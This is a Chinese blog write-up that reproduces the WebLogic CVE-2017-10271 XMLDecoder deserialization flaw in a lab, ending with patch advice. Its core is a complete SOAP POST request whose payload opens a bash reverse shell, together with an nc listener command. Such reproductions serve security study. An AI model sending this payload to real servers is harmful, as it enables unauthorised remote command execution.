weblogic_10.3.6反序列化漏洞复现

最新推荐文章于 2024-05-13 09:41:05 发布
最新推荐文章于 2024-05-13 09:41:05 发布
阅读量316 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/acdcccc/article/details/132701031
版权

weblogic_10.3.6_unserialize _CVE-2017-10271

说明内容
漏洞编号CVE-2017-10271
漏洞名称Weblogic 10.3.6反序列化漏洞
漏洞评级高危
影响范围WebLogic Server 10.3.6.0
WebLogic Server 12.1.3.0
WebLogic Server 12.2.1.3
WebLogic Server 12.2.1.4
WebLogic Server 14.1.1.0
漏洞描述Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
修复方案更新官网补丁

漏洞描述

Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

漏洞等级

高危

影响版本

  • Oracle WebLogic Server 10.3.6.0
  • Oracle WebLogic Server 12.1.3.0
  • Oracle WebLogic Server 12.2.1.3
  • Oracle WebLogic Server 12.2.1.4
  • Oracle WebLogic Server 14.1.1.0

漏洞复现

基础环境

组件版本
OSwindows server 2016
Web Serverchrome
weblogic10.3.6.

漏洞扫描

使用nacs工具进行扫描

sudo ./nacs -h 192.168.117.163 -pa 7001

在这里插入图片描述

漏洞验证

  1. 访问到/wls-wsat/CoordinatorPortType页面,进行抓包

    http://192.168.117.163:7001/wls-wsat/CoordinatorPortType

    在这里插入图片描述

  2. 修改为POST请求,修改Content-Type为text/xml,发送POC数据包

    POST /wls-wsat/CoordinatorPortType HTTP/1.1

Host: 192.168.117.163:7001

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: zbx_sessionid=49238ed3d29ae14f3a4d158dfa8c26cf; ADMINCONSOLESESSION=0SvVk3LQ3j5nxTC5CnGJnMLGrzhmhLLW2Lnj1SqsWp2fllTs7QMD!890617266

Connection: close

Content-Type: text/xml

Content-Length: 638



<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<java version="1.4.0" class="java.beans.XMLDecoder">

<void class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>/bin/bash</string>

</void>

<void index="1">

<string>-c</string>

</void>

<void index="2">

<string>bash -i &gt;&amp; /dev/tcp/192.168.117.163/21 0&gt;&amp;1</string>

</void>

</array>

<void method="start"/></void>

</java>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body/>

</soapenv:Envelope>

  3. dnslog反弹

深度利用

GetShell

  1. 将反弹shell语句加入poc(注意其中反弹shell的语句,需要进行编码,否则解析XML的时候将出现格式错误)

    <string>bash -i &gt;&amp; /dev/tcp/192.168.117.163/21 0&gt;&amp;1</string>

  2. kali开启监听,监听21端口

    nc -lnvp 21

  3. 发包,反弹shell

    在这里插入图片描述

漏洞挖掘

网络测绘

weblogic

修复建议

更新官网补丁

cwangc000
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
记一次weblogic10.3.6.0漏洞cve-2018-3191补丁升级
老赵的博客
01-13 2375
1、下载补丁包: 因为weblogic10.3.6.0 被网络安全查出cve-2018-3191漏洞,需要更新补丁,在oracle官网补丁不太好找,记录一下; 首先查看文档 https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html#AppendixFMW 在文档中选中下图位置: 下一步,登录oracl...
weblogic10.3.6补丁(java序列漏洞更新步骤).docx
09-10
WebLogic 10.3.6 补丁(Java 序列漏洞更新步骤) WebLogic 10.3.6 补丁是一种安全补丁,旨在修 Java 序列漏洞,该漏洞可能会导致 WebLogic 服务器遭受远程攻击。下面是 WebLogic 10.3.6 补丁的更新步骤:...
WebLogic 10.3.6.0 升级序列漏洞补丁
weixin_34220179的博客
02-08 712
由于最近比特币被炒到近乎不可思议的价格,所以网络上的肉鸡都被黑产们一个个培养成了挖矿鸡。今儿就聊聊如何进行WebLogic10的序列漏洞的升级方法。 1、修改bsu.sh 把内存调大vi /home/weblogic/bea/utils/bsu/bsu.sh把这段修改成MEM_ARGS="-Xms1G -Xmx2G"2、下载补丁mkdir -p /home/weblogic/bea/u...
Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 序列漏洞(CVE-2017-10271)
最新发布
weixin_45653478的博客
05-13 1065
CVE-2017-10271 是一个存在于 Oracle WebLogic Server 10.3.6 以下版本中的 XMLDecoder 序列漏洞。此漏洞源于 WebLogic 的 WLS-WebServices 核心组件,该组件使用 XMLDecoder 来解析用户传入的 XML 数据。由于 XMLDecoder 在处理某些特定格式的 XML 数据时存在序列漏洞,攻击者可以构造恶意的 XML 数据来触发该漏洞,从而执行任意命令,获取服务器权限。
关于weblogic 10.3.6.0 的漏洞(1)
aopingying8163的博客
05-08 545
最近小R 搭建了个weblogic, 因为之前在公司找系统漏洞的时候,发了这个漏洞,所以为了特地专门搭建了个10.3.6.0版本。 漏洞编号: CVE-2017-10271 漏洞的描述:就是weblogic 的WLS组件中存在了CVE-2017-10271远程代码的执行漏洞,可以构造请求运行weblogic中间件的主机来进行攻击。此外,还可以利用此漏洞来进行挖矿。 1. 环境就...
关于weblogic 10.3.6.0 的漏洞(2)
aopingying8163的博客
05-09 150
今天小R又学会了一个工具的使用,而且这个工具很强大很强大。 待会介绍。 一、需要的试验环境: 一台宿主机,虚拟机(kali+window2008或其他版本的windows)1.宿主机需要的工具:BT(burpsuite) 2.虚拟机kali:CobaltStrike 工具(我用的是3.8版本),由于这个工具容易被百度云和谐我就步发百度云链接了。可以找我要:QQ135618755...
weblogic 端口号_漏洞:Weblogic < 10.3.6 序列漏洞(CVE201710271)
weixin_31955599的博客
01-26 167
文章说明漏洞是为了学习漏洞利用所写,漏洞都是互联网上以流传已久的各种漏洞的利用及原理,用来增强自己见识,培养自己动手能力,有兴趣的朋友可自行搭建环境练习。源码下载连接在文章最后。漏洞说明Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出序列漏洞,导致可执行任意命令。环境搭建1...
weblogic11g序列漏洞升级操作说明
12-30
weblogic 11g Java序列漏洞升级操作说明
weblogic 10.3.6 安全补丁
04-08
此版本的安全补丁是针对已知安全漏洞的重要更新,特别是对于序列攻击的防护。序列攻击是利用不安全的Java对象序列过程,可能导致远程代码执行、权限提升等严重安全问题。 本安全补丁包包含以下几个关键...
WebLogic 10.3.6 180717 累积更新补丁
11-01
Oracle WebLogic Server 10.3.6 2018年7月17日发布的累积更新补丁包 p27919965_1036_Generic 主要解决CVE-2018-2893及之前的序列等安全漏洞问题 安装之前须先卸载老的补丁 遭到过攻击的服务器 建议删除域并重建
Weblogic10.3.6-2019-4月更新后版本序列漏洞补丁.zip
07-29
Weblogic10.3.6-64位-2019年4月更新后版本--linux系统--序列漏洞补丁
weblogic Weblogic WLS组件漏洞处置 补丁10.3.6.0.0升级10.3.6.0.12
01-09
文件中有两个patch需要打,然后有测试工具和补丁教程可以参看
weblogic序列漏洞测试jar包
02-17
weblogic序列漏洞测试jar包 如涉及版权问题请与我联系
weblogic10.3.6序列补丁
12-19
总的来说,WebLogic 10.3.6序列漏洞的补丁更新是保护系统免受潜在攻击的重要步骤。作为系统管理员,保持软件的最新状态并及时应用安全更新是维护网络安全的关键。对于这些补丁的具体应用,建议参考Oracle提供的...
vulhub-Weblogic-10.3.6 ‘wls-wsat‘ XMLDecoder 序列漏洞(CVE-2017-10271)
m0_58265086的博客
09-08 95
再把抓到的包,按如下的代码制,并对弹sheel的ip更改为kali源码。输入ls -al显示目录下的所有文件夹及文本文档。(这里成功弹,并获取sheel)然后打开kali,输入代码,这里成功抓到sheel。
weblogic __ 10.3.6 __ 序列漏洞 _ CVE-2017-10271
cgjil的博客
09-16 208
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。2、对wls-wsat的资源访问在防火墙或路由器和交换机上做acl访问控制规则。3、在不影响业务的前提下删除相应war包。1、更新Oracle相应补丁。
【网络安全---漏洞】WebLogic 序列漏洞(CVE-2019-2890)漏洞
m0_67844671的博客
09-19 1510
Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证序列安全。本漏洞绕过了Weblogic的序列黑名单,使攻击者可以通过T3协议对存在漏洞的Weblogic组件实施远程攻击。由于T3协议在Weblogic控制台开启的情况下默认开启,而Weblogic默认安装会自动开启控制台,所以攻击者可通过此漏洞造成远程代码执行,以控制Weblogic服务器。
WebLogic_T3序列漏洞
09-01
WebLogic_T3序列漏洞是指在WebLogic应用服务器中存在的一种安全漏洞,攻击者可以利用该漏洞通过T3协议和IIOP协议触发序列操作,从而执行恶意代码或者导致拒绝服务攻击。 这个漏洞的存在是因为WebLogic在处理序列操作时存在缺陷,攻击者可以构造特定的序列数据,通过T3和IIOP协议发送给WebLogic服务器,从而触发序列过程。攻击者可以利用这个漏洞来执行远程代码、获取敏感信息或者导致系统崩溃。 为了修这个漏洞,WebLogic官方推出了相应的安全补丁。此外,关闭T3协议也可以降低受到该漏洞攻击的风险。 <span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [【技术推荐】WebLogic 序列漏洞深入分析](https://blog.csdn.net/m0_73257876/article/details/127034184)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [weblogic序列漏洞测试工具python脚本](https://download.csdn.net/download/qq_27719257/10430628)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cwangc000

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值